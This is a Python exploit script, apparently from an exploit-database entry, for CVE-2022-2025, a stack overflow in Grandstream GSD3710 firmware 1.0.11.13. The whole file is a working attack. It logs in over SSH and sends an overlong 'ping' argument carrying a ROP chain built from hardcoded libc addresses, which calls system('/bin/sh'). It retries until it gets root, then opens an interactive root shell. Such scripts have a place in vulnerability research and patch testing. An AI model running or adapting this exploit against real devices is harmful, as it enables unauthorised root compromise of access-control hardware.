#!/usr/bin/env python3

# Exploit Title:  Grandstream GSD3710 1.0.11.13 - Stack Overflow
# Date: 2025-05-29
# Exploit Author: Pepelux
# Vendor Homepage: https://www.grandstream.com/
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2025

"""
Author: Jose Luis Verdeguer (@pepeluxx)

Required: Pwntools

Example:

$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
"""


from struct import pack
import sys
from time import sleep
import argparse
from pwn import *


def get_args():
    parser = argparse.ArgumentParser(
        formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
            prog, max_help_position=50))

    # Add arguments
    parser.add_argument('-i', '--ip', type=str, required=True,
                        help='device IP address', dest="ip")
    parser.add_argument('-u', '--user', type=str, required=True,
                        help='username', dest="user")
    parser.add_argument('-p', '--pass', type=str, required=True,
                        help='password', dest="pwd")

    # Array for all arguments passed to script
    args = parser.parse_args()

    try:
        ip = args.ip
        user = args.user
        pwd = args.pwd

        return ip, user, pwd
    except ValueError:
        exit()

def check_badchars(payload):
    for i in range(5, len(payload)):
        if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
            log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
            return True
    return False


def main():
    ip, user, pwd = get_args()

    libc_base = 0x76bb8000
    gadget = libc_base + 0x5952C  # 0x0005952c: pop {r0, r4, pc};
    bin_sh = libc_base + 0xCEA9C  # /bin/sh
    system = libc_base + 0x2C7FD  # 0x0002c7fd  # system@libc
    exit = libc_base + 0x2660C

    print("[*] Libc base: %#x" % libc_base)
    print("[*] ROP gadget: %#x" % gadget)
    print("[*] /bin/sh: %#x" % bin_sh)
    print("[*] system: %#x" % system)
    print("[*] exit: %#x\n" % exit)

    padding = b"A" * 320

    payload = b'ping '
    payload += padding
    payload += p32(gadget)
    payload += p32(bin_sh)
    payload += b"AAAA"
    payload += p32(system)
    payload += p32(exit)

    if check_badchars(payload):
        sys.exit(0)

    count = 1

    while True:
        print('Try: %d' % count)
        s = ssh(user, ip, 22, pwd)
        p = s.shell(tty=False)
        print(p.readuntil(b"GDS3710> "))
        p.sendline(payload)
        p.sendline(b"id")
        sleep(1)
        data = p.read()
        if str(data).find('root') > -1:
            print('PWNED!')
            p.interactive()
            s.close()
            sys.exit()
        s.close()
        count += 1

if __name__ == '__main__':
    main()